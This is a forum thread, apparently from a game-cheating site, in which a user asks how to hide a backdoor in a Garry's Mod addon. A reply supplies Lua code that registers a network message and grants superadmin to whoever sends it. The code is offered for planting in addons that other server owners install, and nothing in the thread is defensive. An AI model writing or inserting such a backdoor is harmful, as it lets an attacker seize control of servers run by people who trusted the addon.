Results 1 to 2 of 2
  1. #1
    JamesBlunt1364's Avatar
    Join Date
    Oct 2020
    Gender
    male
    Posts
    0
    Reputation
    10
    Thanks
    0

    How to put backdoor into addon

    Hello i was wondering

    How do i put a backdoor into a addon i want the string to be "coolkid" as thats the string thats in my backdoor menu for it
    Thank You

    any help would be great

  2. #2
    chrabonszcz's Avatar
    Join Date
    May 2018
    Gender
    male
    Posts
    6
    Reputation
    10
    Thanks
    1
    My Mood
    Asleep
    Quote Originally Posted by JamesBlunt1364 View Post
    Hello i was wondering

    How do i put a backdoor into a addon i want the string to be "coolkid" as thats the string thats in my backdoor menu for it
    Thank You

    any help would be great
    you can just create a network string that for example gives you super admin

    Code:
    util.AddNetworkString("something here")
    
    net.Receive("something here",function(len,ply)
        ply:SetUserGroup(superadmin)
    end)
    https://wiki.facepunch.com/gmod/util.AddNetworkString
    https://wiki.facepunch.com/gmod/net.Start
    https://wiki.facepunch.com/gmod/net.Receive
    Last edited by chrabonszcz; 11-02-2020 at 01:50 PM.

Similar Threads

  1. [Solved] How to put a backdoor into a server I have access to
    By Lui1995 in forum Garry's Mod Discussions & Help
    Replies: 4
    Last Post: 03-29-2016, 06:38 AM
  2. [Tutorial] How to put addresses into C#/VB.net
    By Nathan in forum Call of Duty Modern Warfare 3 Tutorials
    Replies: 23
    Last Post: 01-10-2012, 12:37 AM
  3. [Solved] someone teach me how to put SAT chams into CA
    By deadsmoke in forum Combat Arms Mod Help
    Replies: 9
    Last Post: 11-08-2011, 07:33 PM
  4. How to Put this into my Patch
    By bartboy8 in forum Call of Duty Modern Warfare 2 GSC Modding Help/Discussion
    Replies: 4
    Last Post: 03-10-2011, 05:46 PM
  5. [Help Request] How to put 2 projects into 1? VB 2008
    By ryski123 in forum Programming Tutorial Requests
    Replies: 2
    Last Post: 01-02-2011, 11:32 PM